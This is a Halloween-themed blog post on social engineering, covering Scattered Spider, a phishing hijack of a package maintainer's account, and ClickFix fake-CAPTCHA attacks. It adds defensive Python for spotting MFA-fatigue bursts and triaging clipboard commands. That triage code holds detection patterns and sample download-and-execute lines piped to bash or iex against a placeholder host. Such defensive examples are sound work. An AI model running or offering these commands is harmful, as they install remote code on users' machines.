While I understand that an adrenaline rush can cloud judgement, why are the supporting characters in horror films so frustratingly dumb? As soon as they get their hands on a weapon, they’ll use it once, and then leave it behind as they run into an area with a single entry/exit. Yes, there must be sacrifices in order to elevate the spookiness of the film, but c’mon.

A more terrifying movie would portray each character (not only the protagonist) as competent, yet despite their sound logic, they still meet their early demise. Someone pitch a screenplay of a slasher in which all of the victims are NASA engineers.

That would instill a true sense of dread. No matter how intelligent or competent you are, you still become a victim of an attack.

In Hollywood, the threats lurking in the dark are fictional monsters wielding cleavers and chainsaws. At the worst, they may cause nightmares. Yet, in the digital woods, real monsters exist and their attacks can result in serious harm.

Of course, these monsters do not possess any supernatural traits or slash their victims into ribbons, but they do hack their victims into pieces. Although now a common trope, their weapon of choice lures victims in with tricks and targets the mind rather than the body: social engineering.

Spiders catching prey on the webs

Although cyber criminals have been using mind tricks to gain unauthorized access to systems since the dawn of digital time, the latest villains making headlines are called Scattered Spider.

The cybergang emerged as a haunting entity, and has been implicated in dozens of high-profile attacks including the 2023 ransomware attacks on several Las Vegas resorts.

The members of Scattered Spider have become notorious for their layered social engineering techniques. In their campaigns, they harvested personal information on employees of their target organizations or trusted third parties via social media, open-source sleuthing, and leaked databases. With these details in hand, they were able to create convincing costumes of internal members and impersonate them.

Once they had assumed a trusted identity, they engaged in elaborate con jobs, frequently over several conversations, to coax employees into disclosing their credentials or running remote access tools to give them initial access into systems.

Scattered Spider was also known to carry out SIM swap attacks, in which an attacker is able to trick a mobile carrier into transferring a victim’s phone number to a device under their control. Once the transfer is completed, the attacker is then able to obtain access codes and reset passwords to hijack any accounts that use the phone number as a means of identification.

Even if they were unsuccessful in those attacks, the Spiders were also observed to carry out MFA fatigue attacks, a digital torture tactic where victims are bombarded with MFA prompts until they accept.
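One way a defender can surface the MFA fatigue pattern described above is to look for bursts of rejected prompts, especially when an approval follows. This is an added example, not code from any vendor or from the incidents discussed; the event format, the 10-minute window, and the threshold of 5 are assumptions, and the log lines are constructed.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)  # assumed look-back window
THRESHOLD = 5                   # assumed number of rejected prompts that is abnormal

# Constructed sample events: (timestamp, user, prompt outcome).
SAMPLE_EVENTS = [
    ("2025-10-31T02:10:00", "alice", "denied"),
    ("2025-10-31T02:10:40", "alice", "timeout"),
    ("2025-10-31T02:11:30", "alice", "denied"),
    ("2025-10-31T02:12:10", "alice", "denied"),
    ("2025-10-31T02:13:00", "alice", "timeout"),
    ("2025-10-31T02:13:45", "alice", "denied"),
    ("2025-10-31T02:14:20", "alice", "approved"),
    ("2025-10-31T09:00:00", "bob", "denied"),
    ("2025-10-31T09:00:30", "bob", "approved"),
    ("2025-10-31T09:05:00", "carol", "approved"),
]


def detect_mfa_fatigue(events, window=WINDOW, threshold=THRESHOLD):
    """Return (user, timestamp, kind) alerts for bursts of rejected prompts."""
    rejected = defaultdict(deque)  # user -> times of recent denied/timed-out prompts
    alerts = []
    for ts_raw, user, outcome in sorted(events):
        ts = datetime.fromisoformat(ts_raw)
        queue = rejected[user]
        while queue and ts - queue[0] > window:  # drop prompts outside the window
            queue.popleft()
        if outcome in ("denied", "timeout"):
            queue.append(ts)
            if len(queue) == threshold:          # alert once when the burst forms
                alerts.append((user, ts_raw, "prompt_burst"))
        elif outcome == "approved":
            if len(queue) >= threshold:          # approval right after a burst
                alerts.append((user, ts_raw, "approved_after_burst"))
            queue.clear()
    return alerts


if __name__ == "__main__":
    for alert in detect_mfa_fatigue(SAMPLE_EVENTS):
        print(alert)
```

An `approved_after_burst` alert is the one to treat as a likely account takeover: revoke the session and reset the factor rather than waiting for further signals.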

Only recently have a handful of members been identified and arrested. Overall, at least 120 attacks worldwide, resulting in over $115 million in damages, have been attributed to Scattered Spider.

Psychological horror

Just last month, digital villains targeted Josh Junon (qix), an experienced developer and the maintainer of some very popular packages that are collectively downloaded over 2.5 billion times every week.

Junon was tricked into clicking on a link within a highly convincing email disguised as a security policy update notification.

The link navigated Junon to a spoofed, attacker-controlled authentication page. Once he submitted his repository credentials, the villains gained access to his account and began to publish new versions of packages with malware inside.

The malicious code injected itself into browsers in order to monitor for cryptocurrency transactions and silently swap the receiving address with the address of one of the attackers’ wallets. Thankfully, this mass haunting was quickly discovered and resolved before any major damage was done. In the end, the villains only stole ~$450 in Ethereum and ~$50 in Solana.

This is a rare happy ending, as similar package hijacking attacks have not been detected as quickly.

In this event, good triumphed over evil as the community rallied together to defeat the antagonists. However, it serves as a stark reminder that digital curses are real.

ClickFix

In early March 2024, the security community began to notice a new technique being used by online villains. Dubbed “ClickFix” attacks, these ambushes use deceptive CAPTCHA pages that present the user with a series of steps they must take to prove they are not a bot or to fix a nonexistent error.

At the initial stage of the attack, an innocent looking button is displayed. However, once it is clicked, a payload is copied to the victim’s clipboard.

Then, the victim is instructed to paste the payload into their terminal and execute it.

By tricking victims into executing terminal commands, attackers are able to download malware to the system.
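Because the ClickFix chain depends on a pasted command that downloads and runs something, text headed for a terminal can be triaged before it executes. The following is an added example, not part of any tool mentioned here; `triage_clipboard` is a hypothetical helper, the patterns are assumed heuristics rather than a complete signature set, and the samples are constructed.

```python
import re

# Assumed heuristics for illustration; not a complete signature set.
FETCH = re.compile(r"\b(curl|wget|iwr|invoke-webrequest)\b", re.I)
URL = re.compile(r"https?://[^\s'\"|)]+", re.I)
# Content handed straight to an interpreter: "| sh", "| bash", "iex", ...
EXEC = re.compile(r"\|\s*(sh|bash|zsh)\b|\b(iex|invoke-expression)\b", re.I)


def triage_clipboard(text):
    """Classify text that is about to be pasted into a terminal.

    Returns (verdict, reasons) with verdict in {"allow", "review", "block"}.
    """
    reasons = []
    if FETCH.search(text) and URL.search(text):
        reasons.append("fetches remote content")
    if EXEC.search(text):
        reasons.append("passes content to an interpreter")
    if len(reasons) == 2:
        return "block", reasons   # download-and-execute in a single paste
    if reasons:
        return "review", reasons  # one signal only: ask the user to confirm
    return "allow", reasons


# Constructed sample clipboard contents (example.invalid never resolves).
SAMPLES = [
    "git status",
    "curl -sL https://example.invalid/release.tar.gz -o release.tar.gz",
    "curl -sL https://example.invalid/file | shasum -a 256",
    "curl -s https://example.invalid/verify.sh | bash",
    "iwr https://example.invalid/fix.ps1 | iex",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(triage_clipboard(sample)[0], "<-", sample)
```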

In the first reported ClickFix campaign, a threat actor targeted thousands of organizations across the world and developed their CAPTCHA prompts to look as if they were from Google Chrome, Microsoft Word, and OneDrive.

In August of this year, the Ukrainian CERT published the details of its investigation into emails titled “Spreadsheet Replacement” that were sent to government officials and contained a link mimicking a Google spreadsheet. Once clicked, the link opened a window that used the ClickFix attack technique.

Spooky Season is year ’round

The haunting truth about cybersecurity is that a single human error can unravel even the strongest technological defenses.

  • 60% of security breaches can be attributed to human mistakes (Verizon 2025 DBIR).
  • In 2024, attacks that mainly leverage social engineering techniques were responsible for $12.75 billion in losses (FBI IC3).
  • 66% of social engineering attacks target privileged accounts (Palo Alto).
  • 45% of social engineering attacks involved the impersonation of internal personnel (Palo Alto).
  • 60% of social engineering attacks led to data exposure via either direct exfiltration, credential theft, unauthorized access to internal systems, or the deployment of malware (Palo Alto).
  • Over 20% of phishing emails contain links to ransomware (Trend Micro).

The human mind continues to be the greatest threat to security.